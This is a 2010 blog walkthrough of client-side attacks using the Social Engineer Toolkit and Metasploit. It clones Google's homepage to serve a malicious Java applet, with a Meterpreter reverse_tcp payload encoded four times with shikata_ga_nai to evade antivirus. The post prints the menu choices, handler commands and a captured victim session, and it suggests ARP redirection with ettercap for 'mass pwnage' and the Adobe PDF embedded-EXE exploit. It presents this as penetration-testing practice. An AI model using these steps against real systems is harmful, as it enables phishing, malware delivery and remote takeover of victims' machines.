Idea Transcript
netsecuritystuff
Client Side exploits Posted on February 10, 2010
Client side attacks nowadys have become a major focus when performing penetration tests. You are sure once you forward an infected word document or attach malicious exe`s on a pdf, someone in the organisation will open the document. It has become practically impossible to defend against such attacks . A while back Valsmith,Colim ames, and David kerb released a great way to perform such client attacks during the Blackhat and Defcon conferences with the Metaphish paper and code. http://attackresearch.com/pub.html This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit payloads to pdf documents. Since then David Kennedy with the Social Enginnering Framework and produced a marvelous automated tool called SET. SET allows you to perform all the above attacks and even more , one feature i love is the “website cloning feature”, incorporate that with an arp redirect attack with ettercap, and you could pwn all the clients during a pentest. (with permission of course)Imagine cloning a site as common as “Google” or Facebook and then perfoming a java applet attack , total mass pwnage. On backtrack4 final, set is on the path /pentest/exploits/SET/set Usage: Commands are in bold I first downloaded google.com and moved it to /var/www/google/. a simple wget http://www.google.co.ke will do. cp -r http://www.google.co.ke/ /var/www/ cd /var/www/ mv http://www.google.co.ke /var/www/google cd /pentest/exploits/SET/ ./set Select from the menu on what you would like to do: 1. Automatic E-Mail Attacks (UPDATED) 2. Website Java Applet Attack (UPDATED) 3. Update Metasploit 4. Update SET 5. Create a Payload and Listener 6. Help 7. Exit the Toolkit Enter your choice: 2 Website Attack Vectors 1. Let SET create a website for you 2. Clone and setup a fake website (NEW) 3. Import your own website (NEW) 4. Return to main menu. Enter number: 3 Enter your current IP Address: 192.168.20.1 Enter the path to the website to be cloned: /var/www/google/ What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker. 2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8. Import your own executable Specify a path for your own executable Enter choice (example 1-4): 2 Below is a list of encodings to try and bypass AV. Select one of the below, Shikata_Ga_Nai is typically the best. 1. avoid_utf8_tolower 2. shikata_ga_nai 3. alpha_mixed 4. alpha_upper 5. call4_dword_xor 6. countdown 7. fnstenv_mov 8. jmp_call_additive 9. nonalpha 10. nonupper 11. unicode_mixed 12. unicode_upper 13. alpha2 14. No Encoding Enter your choice (enter for default): 2 Usually 1 to 4 does the trick, if you get an error messsage, some encoders don’t like more than one. Specify 0 if you want. How many times do you want to encode the payload: 4 Enter the PORT of the listener: 4444 [-] Encoding the payload 4 times to get around pesky Anti-Virus. [-] [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4) ………………………….. ……………………….. resource (src/program_junk/meta_config)> use exploit/multi/handler resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (src/program_junk/meta_config)> set LHOST 192.168.20.1 LHOST => 192.168.20.1 resource (src/program_junk/meta_config)> set LPORT 4444 LPORT => 4444 resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai ENCODING => shikata_ga_nai resource (src/program_junk/meta_config)> set ExitOnSession false ExitOnSession => false resource (src/program_junk/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 192.168.20.1:4444 [*] Starting the payload handler… msf exploit(handler) > The client goes to the fatefull page http://192.168.20.1 and gets the google search page and runs the java applet. You need to have java installed on client side.
msf exploit(handler) > [*] Sending stage (725504 bytes) [*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123) msf exploit(handler) > sessions Active sessions =============== Id Description Tunnel — ———– —— 1 Meterpreter 192.168.20.1:4444 -> 192.168.20.4:1123 Review a video here on the use of SET : http://vimeo.com/groups/33570/videos/8450443 SET will introduce a version 0.4 soon, with this, you can even sign the java applets yourself. Review a video here on the new version of SET : http://vimeo.com/9198233 Metasploit on the other hand loaded to trunk a java_applet module, with an excellent rank. I have tested it against firefox, ie. It works wonders. For the metasploit module, there is a good tutorial to follow through at paul dot com. The link is http://pauldotcom.com/wiki/index.php/Episode185 The tutorial is easy to understand and follow. Try out the clone feature on SET that downloads the url you give it and embeds the java applet on it. As for pdf attacks, the procedure is the same , try out the adobe attacks and especially the ” Adobe PDF Embedded EXE Social Engineering” on SET and on metasploit it’s the exploit windows/fileformat/adobe_pdf_embedded_exe. References: http://www.attackresearch.com http://www.social-engineer.org http://pauldotcom.com http://metasploit.com Credits: David Kennedy, Valsmith, hdm and the metasploit crew, Carlos perez, pauldotcom crew,muts Happy client side hacking
Loading...
Related
Aurora Attack
Web Application Testing
This entry was posted in Uncategorized. Bookmark the permalink.
2 Responses to Client Side exploits Dexx says: February 12, 2010 at 2:35 pm
I like! Reply
charles watathi says: February 12, 2010 at 4:38 pm
Welcome Dexx Reply
netsecuritystuff Create a free website or blog at WordPress.com.
What am i not doing right?